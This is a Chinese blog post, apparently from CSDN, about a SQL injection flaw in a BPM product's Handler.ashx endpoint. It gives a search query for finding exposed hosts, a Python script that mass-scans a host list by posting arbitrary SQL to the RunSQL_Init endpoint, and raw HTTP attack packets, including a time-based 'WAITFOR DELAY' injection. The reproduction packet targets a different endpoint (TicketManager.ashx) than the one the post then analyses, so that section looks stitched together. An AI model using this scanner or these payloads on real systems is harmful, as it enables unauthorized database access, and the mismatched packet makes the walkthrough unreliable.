声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。
一、漏洞描述
某骋BPM系统是一款全面的商业流程管理平台,旨在帮助企业自动化和优化业务流程。它集成了工作流引擎、表单设计和报表分析等关键功能,能够迅速建立标准化的业务流程,提升工作效率和管理透明度。某骋BPM适用于多种行业场景,如采购审批、费用报销、合同管理等,并提供丰富的行业模板以便快速部署。此外,系统还提供可视化的流程建模工具,使业务人员能够轻松参与流程设计和优化。凭借其强大的功能和卓越的用户体验,某骋BPM推动企业实现数字化转型,并提高整体运营管理水平。然而,其接口Handler.ashx存在SQL注入漏洞,攻击者可能通过此漏洞获取数据库敏感信息或执行系统命令。
二、资产收集
1.使用网络空间测绘引擎搜索
鹰图检索:web.body="BP.WF.HttpHandler.WF_Portal"
2.使用poc批量扫描
import requests
import urllib3
from urllib.parse import urljoin, quote
import argparse
import ssl
import re
# 禁用SSL证书验证,忽略警告
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def read_file(file_path):
"""
读取文件中的URL列表
:param file_path: 文件路径
:return: URL列表
"""
with open(file_path, 'r') as file:
urls = file.read().splitlines()
return urls
def check(url):
"""
检查目标URL是否存在CCBPM_Handler_Init_SQLInject漏洞
:param url: 目标URL
:return: 如果存在漏洞,返回True
"""
url = url.rstrip("/")
target = urljoin(url, "/WF/Comm/Handler.ashx?DoType=RunSQL_Init")
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Content-Type": "multipart/form-data; boundary=----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1"
}
data='------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1\r\nContent-Disposition: form-data; name="SQL"\r\n\r\nSELECT HASHBYTES(\'MD5\', \'123456\')\r\n------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1--'
try:
response = requests.post(target, verify=False, headers=headers, timeout=5, data=data)
if response.status_code == 200 and '4QrcOUm6Wau+VuBX8g+IPg==' in response.text:
print(f"\033[31mDiscovered:{url}: CCBPM_Handler_Init_SQLInject!\033[0m")
return True
except Exception as e:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL")
parser.add_argument("-f", "--txt", help="file")
args = parser.parse_args()
url = args.url
txt = args.txt
if url:
check(url)
elif txt:
urls = read_file(txt)
for url in urls:
check(url)
else:
print("help")
cmd运行poc脚本:python poc.py -f host.txt
随机寻找的幸运儿
三、漏洞复现
1.构造数据包
1.构造数据包:
POST /SystemManager/Api/TicketManager.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 61
Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:15'--2.数据包分析
这是一个HTTP POST请求的数据包,用于向服务器发送数据。以下是对数据包各部分的详细解析:
1. 请求行(Request Line):
POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1
这表示客户端希望向服务器发送一个POST请求,目标URL是`/WF/Comm/Handler.ashx?DoType=RunSQL_Init`,使用的HTTP协议版本是1.1。2. 请求头(Request Headers):
Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 Content-Type: multipart/form-data; boundary=----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1 Content-Length: 147
这些头部信息包括:
- `Host`:指定了请求的目标服务器地址。
- `User-Agent`:描述了发起请求的客户端类型和版本。
- `Content-Type`:指定了请求体的内容类型,这里是`multipart/form-data`,并指定了分隔符为`----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1`。
- `Content-Length`:指定了请求体的长度,这里是147字节。3. 空行(Empty Line):
数据包中有一个空行,表示请求头和请求体之间的分隔。4. 请求体(Request Body):
------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1 Content-Disposition: form-data; name="SQL" SELECT HASHBYTES('MD5', '123456') ------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1--
这部分包含了实际要发送给服务器的数据。这里使用了`multipart/form-data`格式,每个部分由边界分隔符开始,然后是`Content-Disposition`头部,指定了表单字段的名称。在这个例子中,只有一个名为`SQL`的字段,其值为`SELECT HASHBYTES('MD5', '123456')`。最后,边界分隔符再次出现,后面跟着两个连字符`--`,表示结束。
3.结束跑路
1.构造数据包,发送。
每篇一言:萧萧玉笛兮孩儿啼,绵绵征军兮终不返。
标签:form,url,数据包,BPM,Content,漏洞,Handler,file,data From: https://blog.csdn.net/weixin_54799594/article/details/141226708